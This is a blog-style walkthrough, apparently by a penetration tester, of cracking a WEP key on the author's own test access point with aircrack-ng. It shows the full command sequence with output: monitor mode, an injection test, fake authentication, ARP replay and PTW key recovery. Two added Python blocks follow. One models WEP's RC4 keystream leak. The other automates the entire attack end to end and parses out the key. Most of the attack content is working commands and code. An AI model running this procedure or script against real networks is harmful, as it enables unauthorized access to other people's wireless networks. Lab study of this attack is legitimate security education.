WEP Cracking with Aircrack-ng in Kali

While I wasn't able to find any WEP networks in my neighborhood, I set up a demo AP for some WEP cracking at home.

For those of you who didn't know, I recently picked up a new Alfa card, so it was time to give it a test drive.

Setup

First, I set up a second SSID on my AP with WEP enabled, and generated a random 128-bit key. (That "128-bit" is marketing arithmetic: the secret key is 13 bytes, or 104 bits, and the other 24 bits are the per-packet IV that is sent in the clear.)

Once the AP was configured, I ran airodump-ng to find the new network. The --encrypt WEP flag filters the results so that only WEP networks are shown.

root@kali:~/wep# airodump-ng wlan0mon --encrypt WEP

WEP Cracking - AP

Monitoring

After I found the new SSID, I restarted my monitoring interface locked to channel 1, the AP's channel, so the card stops hopping while I capture and inject.

root@kali:~/wep#  airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset
phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n
        (mac80211 station mode vif enabled on [phy0]wlan0)
        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

root@kali:~/wep#  airmon-ng start wlan0 1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  431 NetworkManager
  869 wpa_supplicant
 1747 dhclient

PHY    Interface    Driver        Chipset
phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

Once the monitoring interface was back up (I ignored the warning about NetworkManager, wpa_supplicant and dhclient; if one of them later resets the interface mid-capture, airmon-ng check kill is the fix), it was time to test packet injection.

root@kali:~/wep#  aireplay-ng -9 -e WEPisBAD -a 06:xx:xx:xx:xx:xx wlan0mon
11:34:22  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
11:34:22  Trying broadcast probe requests...
11:34:22  Injection is working!
11:34:24  Found 1 AP

11:34:24  Trying directed probe requests...
11:34:24  06:xx:xx:xx:xx:xx - channel: 1 - 'WEPisBAD'
11:34:25  Ping (min/avg/max): 2.423ms/15.027ms/29.647ms Power: -44.93
11:34:25  30/30: 100%

With injection confirmed (30 of 30 probes answered, 100%), I started airodump-ng again, this time locked to channel 1 and filtered to the target BSSID, writing the capture to a file so aircrack-ng can read the IVs from it.

root@kali:~/wep#  airodump-ng -c 1 --bssid 06:xx:xx:xx:xx:xx -w output wlan0mon

WEP Cracking - Airodump

Authentication

The next step was a fake authentication with the AP. An AP only accepts data frames from a station that has authenticated and associated with it; anything from an unknown MAC is answered with a deauthentication, so the ARP replay in the next step would go nowhere. Open System authentication never involves the WEP key, so aireplay-ng can complete it without knowing the key. The MAC given with -h must be the injecting card's own address, and the same address has to be used with -h in the replay step.

root@kali:~/wep#  aireplay-ng -1 0 -e WEPisBAD -a 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:33:51  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1

11:33:51  Sending Authentication Request (Open System) [ACK]
11:33:51  Authentication successful
11:33:51  Sending Association Request [ACK]
11:33:51  Association successful :-) (AID: 1)

Attack

Once the fake authentication was complete, I could start generating traffic. I used aireplay-ng in ARP replay mode: it waits for an ARP request on the network, then re-injects that same encrypted frame over and over. The AP accepts each copy (it comes from an associated MAC and its ICV is valid) and forwards it re-encrypted under a new IV, so every replay yields a fresh IV without the attacker ever decrypting anything. ARP requests are the frame of choice because they have a fixed size and their first 16 plaintext bytes (LLC/SNAP header plus the start of the ARP header) are predictable, which is exactly the known plaintext the statistical attack in aircrack-ng feeds on. In the output below, a single captured ARP request is replayed hundreds of times.
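
To make the mechanism above concrete, here is an added example (mine, not code from the post or from aircrack-ng) that models the WEP side of the exchange in Python: RC4 keyed with IV||key, the fixed LLC/SNAP + ARP prefix, what an attacker learns from each re-encrypted replay, and what happens when an IV repeats. The AP, the IV generator and the ARP addresses are constructed stand-ins; the key is the 13-byte one recovered later in the post.

```python
"""WEP per-packet encryption and what ARP replay leaks. Example code written for
this write-up; it is not part of aircrack-ng. IVs and addresses are constructed."""
import os
import struct
import zlib

# The 13-byte (104-bit) key recovered later in the post, reused as the AP's secret.
WEP_KEY = bytes.fromhex("58467E7D5F7D2C6C3A465D5A6E")


def arp_known_prefix(opcode: int = 1) -> bytes:
    """First 16 plaintext bytes of every 802.11 ARP frame: LLC/SNAP header for
    EtherType 0x0806, then ARP hw type 1, proto 0x0800, hlen 6, plen 4, opcode."""
    return bytes.fromhex("AAAA030000000806") + struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP uses the stream from byte 0 with no discard."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV(3) || key-id(1) || RC4(IV||key) over plaintext || CRC-32 ICV.
    The per-packet key is nothing more than the public IV glued onto the secret."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + xor(plaintext + icv, rc4_keystream(iv + key, len(plaintext) + 4))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: plaintext, or None if the ICV does not check out."""
    iv, body = frame[:3], frame[4:]
    pt = xor(body, rc4_keystream(iv + key, len(body)))
    data, icv = pt[:-4], pt[-4:]
    return data if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) == icv else None


def leaked_keystream(frame: bytes, known_plaintext: bytes):
    """Attacker side: the IV is in the clear and the ARP prefix is known, so
    ciphertext XOR known plaintext gives the first 16 keystream bytes of IV||key."""
    return frame[:3], xor(frame[4:], known_plaintext)


def simulate_arp_replay(key: bytes, arp_request: bytes, count: int) -> list:
    """Stand-in for what aireplay-ng --arpreplay provokes: the AP re-encrypts the
    same replayed request each time under a fresh IV. IVs here are random and
    deduplicated; real firmware often just counts up, or reuses them."""
    frames, seen = [], set()
    while len(frames) < count:
        iv = os.urandom(3)
        if iv not in seen:
            seen.add(iv)
            frames.append(wep_encrypt(key, iv, arp_request))
    return frames


def harvest(frames, known_plaintext=None) -> dict:
    """IV -> leaked keystream prefix. A table like this, tens of thousands of
    entries deep, is the raw material the PTW (and older FMS/KoreK) attacks vote on."""
    known = known_plaintext or arp_known_prefix()
    return dict(leaked_keystream(f, known) for f in frames)


def iv_reuse_leak(frame_a: bytes, frame_b: bytes):
    """Only 2^24 IVs exist, so reuse is inevitable. Two frames under one IV share
    a keystream, and their ciphertext XOR is the XOR of their plaintexts."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return xor(frame_a[4:], frame_b[4:])
```

The point of `harvest` is that the attacker never needs to decrypt a replayed frame: every copy the AP forwards hands over a (IV, keystream-prefix) pair for free, and the replay loop just manufactures those pairs as fast as the link allows.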

root@kali:~/wep#  aireplay-ng --arpreplay -b 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:35:44  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
Saving ARP requests in replay_arp-0318-113544.cap
You should also start airodump-ng to capture replies.
Read 4036 packets (got 1 ARP requests and 128 ACKs), sent 129 packets...(498 pps)
Read 4147 packets (got 1 ARP requests and 178 ACKs), sent 179 packets...(499 pps)
Read 4255 packets (got 1 ARP requests and 228 ACKs), sent 230 packets...(501 pps)
Read 4362 packets (got 1 ARP requests and 278 ACKs), sent 280 packets...(501 pps)
Read 4471 packets (got 1 ARP requests and 329 ACKs), sent 329 packets...(499 pps)
Read 4574 packets (got 1 ARP requests and 378 ACKs), sent 379 packets...(499 pps)
Read 4679 packets (got 1 ARP requests and 427 ACKs), sent 429 packets...(499 pps)
Read 4790 packets (got 1 ARP requests and 479 ACKs), sent 480 packets...(500 pps)
Read 4895 packets (got 1 ARP requests and 528 ACKs), sent 530 packets...(500 pps)
Read 5003 packets (got 1 ARP requests and 578 ACKs), sent 579 packets...(499 pps)
Read 5111 packets (got 1 ARP requests and 629 ACKs), sent 629 packets...(499 pps)
Read 5217 packets (got 1 ARP requests and 678 ACKs), sent 680 packets...(500 pps)

WEP Cracking - ARP Replay

After a while (around 5,000 data packets), I tried to crack the key. As you can see, this did not work: 6,735 IVs is nowhere near enough for the 13-byte key I had generated. The PTW attack typically needs on the order of 40,000 or more IVs for a 104-bit key, versus roughly 20,000 for a 40-bit one. Left running against the growing capture file, aircrack-ng retries the attack every 5,000 new IVs until it succeeds. Each row of the table is one key byte (KB) with the top-voted candidate values; the depth column shows how far down the candidate list the search had to go.

root@kali:~/wep#  aircrack-ng output-0*.cap
Opening output-01.cap
Read 138001 packets.

   #  BSSID              ESSID                     Encryption

   1  06:xx:xx:xx:xx:xx  WEPisBAD                  WEP (6710 IVs)

Choosing first network as target.

Opening output-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 6735 ivs.

                                 Aircrack-ng 1.2 rc4

                 [00:00:04] Tested 168121 keys (got 7125 IVs)

   KB    depth   byte(vote)
    0   17/ 18   E4(9728) 13(9472) 29(9472) 2E(9472) 86(9472)
    1   15/ 19   F6(9728) 18(9472) 29(9472) 2F(9472) 50(9472)
    2    4/  5   D7(10752) 33(10240) 53(10240) AB(10240) D4(10240)
    3   10/  3   9D(9984) 73(9728) 76(9728) 78(9728) 7E(9728)
    4   21/  4   C1(9728) 08(9472) 2C(9472) 4D(9472) 8E(9472)

Failed. Next try with 10000 IVs.

Once I had just over 34,000 IVs, aircrack was able to get the WEP key!

WEP Cracking - Key Obtained

58:46:7E:7D:5F:7D:2C:6C:3A:46:5D:5A:6E
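
Glue for the whole procedure above, as an added example (mine, not the post's or aircrack-ng's): it runs the same commands in the same order and watches aircrack-ng's output for the key. The interface names and ESSID are the post's; the BSSID and client MAC are placeholders because the post masks the real addresses. The parsers are fed constructed output modelled on the transcripts above, and the driver itself only does something useful on a root shell with an injection-capable card.

```python
"""Drives the WEP attack from this post end to end and parses the tool output.
Example code written for this write-up; it is not part of aircrack-ng."""
import re
import subprocess
import sys
import time

# Assumed lab values. The post masks the real BSSID and client MAC, so these are
# placeholders to replace; the interface names and ESSID are the post's.
PHY_IFACE = "wlan0"
MON_IFACE = "wlan0mon"
CHANNEL = "1"
ESSID = "WEPisBAD"
BSSID = "06:00:00:00:00:01"    # placeholder for 06:xx:xx:xx:xx:xx
OUR_MAC = "00:00:00:00:00:02"  # placeholder for the card's MAC, 00:xx:xx:xx:xx:xx
CAPTURE = "output-01.cap"      # what 'airodump-ng -w output' creates in a clean directory

KEY_RE = re.compile(r"KEY FOUND!\s*\[\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2})+)\s*\]")


def injection_works(aireplay_test_output: str, min_pct: int = 30) -> bool:
    """aireplay-ng -9 ends with 'answered/sent: pct%'. Below roughly 30% the
    ARP replay will be too lossy to be worth running."""
    if "Injection is working!" not in aireplay_test_output:
        return False
    m = re.search(r"(\d+)/(\d+):\s*(\d+)%", aireplay_test_output)
    return m is not None and int(m.group(3)) >= min_pct


def fake_auth_ok(aireplay_auth_output: str) -> bool:
    """aireplay-ng -1 prints this once the AP has accepted our MAC."""
    return "Association successful" in aireplay_auth_output


def iv_count(aircrack_output: str) -> int:
    """Highest IV count aircrack-ng has reported so far ('WEP (N IVs)' in the
    network list, 'got N IVs' in the status line); 0 if none yet."""
    counts = re.findall(r"(?:got |WEP \()(\d+) IVs", aircrack_output)
    return max((int(n) for n in counts), default=0)


def parse_key(aircrack_output: str):
    """The colon-separated hex key from 'KEY FOUND! [ ... ]', or None."""
    m = KEY_RE.search(aircrack_output)
    return m.group(1).upper() if m else None


def key_bits(key: str) -> int:
    """Secret-key size: 5 bytes is '64-bit' WEP, 13 bytes is '128-bit'; the
    advertised size counts the 24-bit IV that travels in the clear."""
    return len(key.split(":")) * 8


def sh(*args: str) -> str:
    return subprocess.run(args, capture_output=True, text=True).stdout


def run_attack():
    """The post's steps in order. Needs root and an injection-capable card."""
    sh("airmon-ng", "stop", MON_IFACE)
    sh("airmon-ng", "start", PHY_IFACE, CHANNEL)          # lock to the AP's channel
    test = sh("aireplay-ng", "-9", "-e", ESSID, "-a", BSSID, MON_IFACE)
    if not injection_works(test):
        sys.exit("injection test failed:\n" + test)
    quiet = dict(stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    dump = subprocess.Popen(["airodump-ng", "-c", CHANNEL, "--bssid", BSSID,
                             "-w", "output", MON_IFACE], **quiet)
    auth = sh("aireplay-ng", "-1", "0", "-e", ESSID, "-a", BSSID, "-h", OUR_MAC, MON_IFACE)
    if not fake_auth_ok(auth):
        dump.terminate()
        sys.exit("fake authentication failed:\n" + auth)
    replay = subprocess.Popen(["aireplay-ng", "--arpreplay", "-b", BSSID,
                               "-h", OUR_MAC, MON_IFACE], **quiet)
    time.sleep(3)  # let airodump-ng create the capture file before aircrack-ng opens it
    # aircrack-ng keeps re-reading the growing capture and retries every 5000 IVs
    # by itself, so just stream its output and stop everything once the key shows.
    crack = subprocess.Popen(["aircrack-ng", "-b", BSSID, CAPTURE],
                             stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
    seen = ""
    try:
        for line in crack.stdout:
            seen += line
            key = parse_key(seen)
            if key:
                print(f"{key_bits(key)}-bit key after ~{iv_count(seen)} IVs: {key}")
                return key
    finally:
        for proc in (crack, replay, dump):
            proc.terminate()
    return None


if __name__ == "__main__":
    run_attack()
```

The one-shot `-1 0` fake authentication from the post is fine when the ARP replay starts right away; for a long capture the aircrack-ng wiki's `-1 6000 -o 1 -q 10` form keeps the association alive with periodic keep-alives, which is the change to make if the AP starts deauthenticating the injecting MAC.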

Connecting

To verify the key was correct, I attempted to authenticate using the networking UI.

WEP Cracking - Connecting

After a few seconds, I connected, and iwconfig showed my access!

WEP Cracking - Connected

Conclusion

While WEP cracking is a little less relevant nowadays, it was still a fun exercise to try out my new toy. For more information about this attack, and many more, I recommend the aircrack wiki.

doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration tester for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Filed under Security Not Included